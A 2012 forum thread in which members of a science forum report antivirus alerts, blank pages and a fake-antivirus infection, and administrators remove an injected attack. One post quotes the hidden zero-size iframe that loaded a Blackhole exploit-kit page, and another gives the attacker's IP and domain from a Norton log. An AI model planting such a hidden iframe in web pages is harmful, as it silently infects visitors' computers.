Jump to content


Photo
- - - - -

Virus warning, blank screens, etc


  • Please log in to reply
41 replies to this topic

#1 Aethelwulf

Aethelwulf

    Explaining

  • Members
  • 935 posts

Posted 01 August 2012 - 08:09 PM

Every time I log on, the site tries to give my computer a virus. I thought I should let you know.

#2 JMJones0424

JMJones0424

    ~3720:1

  • Members
  • 783 posts

Posted 01 August 2012 - 11:06 PM

For about the last 24 hours, I've had problems with this site. The following alert pops up and prevents anything but a white screen from scienceforums.com
I can get in through hypography.com and selecting forums, but still have the threat pop-up and problems with all parts of the forum loading.

OS is Windows Vista, problem occurs with IE, Firefox, and Chrome.

Posted Image

#3 LaurieAG

LaurieAG

    Explaining

  • Members
  • 1,238 posts

Posted 01 August 2012 - 11:27 PM

It is called Web attack: Blackhole Toolkit website 14 and it comes from NETROUTING-AS Netrouting data facilities. Blocking 2.08.76.52.102 may help .

#4 LaurieAG

LaurieAG

    Explaining

  • Members
  • 1,238 posts

Posted 01 August 2012 - 11:43 PM

208.76.52.102

#5 Aethelwulf

Aethelwulf

    Explaining

  • Members
  • 935 posts

Posted 02 August 2012 - 12:02 AM

Yes having the same problem, some parts of the site I can't enter and I can't even edit posts :(

#6 phillip1882

phillip1882

    Thinking

  • Members
  • 584 posts

Posted 02 August 2012 - 12:07 AM

yeah get the same error, how to block?

#7 LaurieAG

LaurieAG

    Explaining

  • Members
  • 1,238 posts

Posted 02 August 2012 - 12:20 AM

Pull the site and clean it. The source below is from the page I am editing this post on now.

<iframe src="http://attentiongett....info/main.php" width=0 height=0 frameborder=0 style="display:none;"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR...l1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook....com/2008/fbml">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<title>Avg Showing Site As A Threat - Hypography Science Forums</title>
<link rel="shortcut icon" href='http://scienceforums.com/favicon.ico' />
<link rel="image_src" href='http://scienceforums...ienceforums.png' />
<script type='text/javascript'>

#8 Aethelwulf

Aethelwulf

    Explaining

  • Members
  • 935 posts

Posted 02 August 2012 - 12:25 AM

Sorry, but what do you mean, ''pull the site and clean it.'' I am computer illiterate see :P Can you take us step by step?

#9 Under the Rose

Under the Rose

    Questioning

  • Members
  • 122 posts

Posted 02 August 2012 - 12:36 AM

This seems like as good a thread as any to let you know that today when I came to this forum, my Norton is advising me that we are under attack every time I load a page here. Also, the only way that I can get to a thread is by means of the subforum and the thread title. The links from who posted most recently only come up to a white page. Here is an image taken with my snip tool in case it is of any assistance.

Oh, yes, and the image link is not working but I believe the link will get you through to my Picassa Web image.

https://lh4.googleus.../Hypography.PNG

I am not having this problem on any of the other forums I post on although the same thing happened several months ago at one of them and the administrator was able to fix things. It will be deterring visitors to your thread, I am thinking, to be greeted by such things.

#10 LaurieAG

LaurieAG

    Explaining

  • Members
  • 1,238 posts

Posted 02 August 2012 - 12:52 AM

Sorry Aethelwulf, I mean the administrators have to take the site off the internet, remove the offending code and see if the site remains unaltered.

#11 Tormod

Tormod

    Hypographer

  • Members
  • 14,353 posts

Posted 02 August 2012 - 03:55 AM

Thanks. This seems to be the same type of attack we had a while back. We're investigating.

#12 Tormod

Tormod

    Hypographer

  • Members
  • 14,353 posts

Posted 02 August 2012 - 04:30 AM

The immediate problem has been removed. The underlying problem may still exist, so we're investigating further. The site may need to be seriously updated, it has been a while now.

#13 Tormod

Tormod

    Hypographer

  • Members
  • 14,353 posts

Posted 02 August 2012 - 04:40 AM

Thanks. We have identified the problem.

#14 arKane

arKane

    Understanding

  • Members
  • 387 posts

Posted 02 August 2012 - 10:52 AM

Under the Rose is not the only one getting those intrusion attacks by Norton when clicking on a notification email link. I copied the more details and pasted below. If I copied the same link out of the email and had Norton check it it comes back saying it's safe. Also, this has only happened when accessing this forum.

´╗┐Category: Intrusion Prevention Date & Time,Risk,Activity,Status,Recommended Action,IPS Alert Name,Default Action,Action Taken,Attacking Computer,Attacker URL,Destination Address,Source Address,Traffic Description 2012-08-01 19:40:32,High,An intrusion attempt by 208.76.52.102 was blocked.,Blocked,No Action Required,Web Attack: Blackhole Toolkit Website 20,No Action Required,No Action Required,"208.76.52.102, 80",attentiongettingdokogeo.info/main.php,"PC (192.168.0.3, 54458)",208.76.52.102,"TCP, www-http" Network traffic from <b>attentiongettingdokogeo.info/main.php</b> matches the signature of a known attack. The attack was resulted from \DEVICE\HARDDISKVOLUME2\PROGRAM FILES (X86)\MOZILLA FIREFOX\FIREFOX.EXE. To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.


Edited by arKane, 02 August 2012 - 10:54 AM.


#15 arKane

arKane

    Understanding

  • Members
  • 387 posts

Posted 02 August 2012 - 10:59 AM

I got the following notification email yesterday about 9:30 pm, but cannot find it in this topic for some reason.

Under the Rose has just posted a reply to a topic that you have subscribed to titled "The Great Spam Storm Of 13-14 July 2012".

----------------------------------------------------------------------
This seems like as good a thread as any to let you know that today when I came to this forum, my Norton is advising me that we are under attack every time I load a page here. Also, the only way that I can get to a thread is by means of the subforum and the thread title. The links from who posted most recently only come up to a white page. Here is an image taken with my snip tool in case it is of any assistance.

Oh, yes, and the image link is not working but I believe the link will get you through to my Picassa Web image.

https://lh4.googleus.../Hypography.PNG (https://lh4.googleus.../Hypography.PNG)

I am not having this problem on any of the other forums I post on although the same thing happened several months ago at one of them and the administrator was able to fix things. It will be deterring visitors to your thread, I am thinking, to be greeted by such things.
----------------------------------------------------------------------



#16 belovelife

belovelife

    psionicist - preserver lv.143

  • Members
  • 1,397 posts

Posted 02 August 2012 - 11:41 AM

ok, same thing happened to me, but it is called live securuty platinum

cannot remove it from my computer

and it limited access to the net
it happened right whne i logged on to hypography yesterday

my browser shut,

and i had to go to a restore point just to use the web

now was it loading up this site, or what

i don't know

but the site was down yesterday

and everytime i tried to acess it, same thing happened

and i'm still trying to remove the live security platinum

( 85 dollars for a lifetime subscription, not bad, but don't have the dough )

dang

#17 belovelife

belovelife

    psionicist - preserver lv.143

  • Members
  • 1,397 posts

Posted 02 August 2012 - 12:13 PM

i get live security platinum,

same thing,

basically
but now its on my computer,

i had to use a restore point just to access the web in anyway, shape or form

i used housecall, and it found 1 threat and supposedly eliminated it

but the darm program is still on my computer

i deleted the files manually

but when i turned my computer back on

there it was again

does hypography have a housecall like function, or thread?